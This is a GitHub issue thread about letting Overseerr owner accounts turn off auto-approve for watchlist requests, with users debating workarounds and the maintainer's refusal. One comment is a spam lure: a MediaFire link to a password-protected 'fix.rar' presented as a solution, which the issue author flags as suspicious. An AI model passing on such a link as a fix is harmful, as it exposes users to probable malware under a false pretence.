### ISSUE TITLE
Disable Auto Approve for Owner accounts

### ISSUE THREAD

**Issue by KlutzyBubbles** [sct/overseerr#3926]
### Description

I want to be able to disable the auto approve permission for my owner account. This is useful for when im logged into plex on my families TV, if they add something to the watchlist it bypasses the regular approval that regular users have (which I want because my nas size isnt infinite).

### Desired Behavior

Ability to turn off auto approve permission for owner account.

### Additional Context

 The current solution I have are disabling watchlist import for owner (which i prefer not to as having a list of approvals is easier to manage in terms of who requested what first.) or from searches, i would need to turn on local accounts and create a new owner local account and switch the plex account to a regular user, which also isnt ideal.

If there is an obvious way to turn off the auto approve already, please link the solution to me. I have searched google, github issues and wasn't able to find anything relating to this.

### Code of Conduct

- [X] I agree to follow Overseerr's Code of Conduct

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KlutzyBubbles** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

Seems a bit sus, nothing against you but i wont be downloading that and will wait until a traceable change has been made.

**Comment by SerenModz21** [comment]
while i don't have any involvement with the development of overseerr but rather just a standard user like yourself, wouldn't a better approach be to have a seperate plex account for the family tv? that way, the watchlist, watch history and security/safety of your account.

**Comment by KlutzyBubbles** [comment]
> while i don't have any involvement with the development of overseerr but rather just a standard user like yourself, wouldn't a better approach be to have a seperate plex account for the family tv? that way, the watchlist, watch history and security/safety of your account.

Probably a good idea, haven't really thought of doing that. 

Still want this feature though. And from my understanding letting the permission be editable but defaulting to on shouldn't be too hard nor affect existing/new installations in any way.

**Comment by sct** [comment]
I'd suggest a different account for your shared TV. We will not change the owner permissions because the owner should always have absolute permission by design.

**Comment by storm1er** [comment]
Hi,

I'm not at ease with the workaround "use a separate Plex account". To my point of view, creating additional Plex accounts isn't a viable solution for me due to Plex's Terms of Service, which emphasize that accounts are intended for individual use and sharing with immediate family members. Managing multiple accounts can also lead to complications with personal media libraries and watch histories. You can also account for Plex not allowing multiple accounts on the same email (please, don't answer with "create a second email" or "use `yourmail+flag@provid.er`" 😆 )

Disabling auto-approve for owner accounts is highly requested by the community:

- https://www.reddit.com/r/Overseerr/comments/182xfme/turn_off_auto_approve_for_adminowner/
- https://www.reddit.com/r/Overseerr/comments/1ccajy0/overseerr_how_not_to_automatically_request_movies/
- https://www.reddit.com/r/Overseerr/comments/1btmsc3/any_way_to_avoid_autorequestingapproving_items/

Allowing the option to disable auto-approve for owner accounts would help users like me manage requests more effectively without altering our account setups. An alternative solution could be enabling the transfer of owner permissions to another account within Overseerr. This way, we could have a dedicated admin account for management tasks while keeping our primary Plex accounts free to add items to watchlists without triggering automatic downloads.

I believe implementing this feature would benefit many users and improve overall usability. Could you please reconsider reopening this issue?


------

My main and personal reason is that I often talk about series and movies with friends, sometimes I would like to add stuff to my watchlist by bulk, but my harddrive is not *that* big :/ 

Adding something to my watchlist does not mean "I WANT TO WATCH THIS NOOOOWWWWW"

**Comment by Optekah** [comment]
Shocked that this isn't a simple checkbox stowed away in the settings. Please consider implementing this and let the owner **_choose_** how they want to operate and interact with their own servers!

**Comment by storm1er** [comment]
I just saw the notification of @Optekah message above and discovered some reactions on my post. So I consider a ping @sct to be a reasonable action so we can have a definitive answer: Will the Overseer's team reconsider this?

**Comment by j0hnm4r5** [comment]
> I'd suggest a different account for your shared TV. We will not change the owner permissions because the owner should always have absolute permission by design.

@sct I want to respectfully challenge the decision to close this.

The core issue here is a conflation of _permissions_ and _features_, which should remain conceptually distinct in any well-designed system. Permissions determine who can do something, while features determine what is possible within the application. Tying these together harms both UX clarity and system flexibility.

Permissions should define what a user _can_ do, not what _must_ happen by default.

Forcing auto-approve for owners removes useful operational control from the very users Overseerr trusts most. The ability to disable this isn't a security risk — it’s a workflow preference, and denying it harms flexibility in legitimate, common use cases like shared devices or managing storage constraints.

**Comment by fronc** [comment]
Respectfully, there's another reason why we would not want this as an unchangeable behavior - interventions like [Availarr](https://github.com/availarr). This performs a check to see if the content exists on subscribed streaming services before allowing the auto-approve. But now, only my other plex users can make these requests, and I, as the admin, don't benefit from the extra check/intervention.

So either incorporate (with permission) Availarr's services, or allow us to uncheck the box so we can manage this as we wish. Thank you for reconsidering!

**Comment by fronc** [comment]
I've submitted a PR to take care of this. @sct I know there's been a lot of chat about this in the past, but the solution I provided ensures admins can't break their admin account, the toggle only allows toggling Auto-approve permissions, which is a great and harmless option to provide the admin account. Please contact me with any questions!
